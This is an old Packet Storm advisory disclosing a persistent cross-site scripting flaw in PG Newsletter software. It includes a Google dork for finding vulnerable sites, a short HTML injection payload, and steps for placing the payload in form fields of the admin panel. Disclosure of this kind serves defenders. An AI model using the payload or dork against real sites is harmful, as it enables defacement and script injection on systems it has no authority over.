PG Newsletter Cross Site Scripting

2011-07-13T00:00:00
ID PACKETSTORM:103002
Type packetstorm
Reporter r007k17-w
Modified 2011-07-13T00:00:00

Description

                                        
                                            ` %+  
$.......#........4.........|).......0............\/\/ %+  
  
  
%+  
%+  
  
  
%++++++++++++++++++++++++++++++++++++++++  
  
  
# Exploit Title: PG Newsletter persistent XSS vulnerability  
# Vendor: demo.newsletter.pro  
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D  
# My Blog: http://www.shadowrootkit.wordpress.com  
# Google Dork: © 2010 PilotGroup.NET <http://www.pilotgroup.net/> Powered  
by PG Newsletter Software <http://www.newsletter.pro/> - email marketing  
software  
  
****************************************************************************************************************************************************************************************  
Persistent XSS Vulnerability  
********************************  
{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit  
EXPLOIT: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>  
  
Observe: login to the admin panel(demo).Inject this script in a create form  
page, i.e, (DEMO) in formname field or thankyoupageURL field  
Now observe: demo.newsletter.pro/forms/index.php  
  
*****************************************************************************************************************************************************************************************  
sp3c14l Thanks to s1d3 effects and my friends@!3.14--  
*****************************************************************************************************************************************************************************************  
`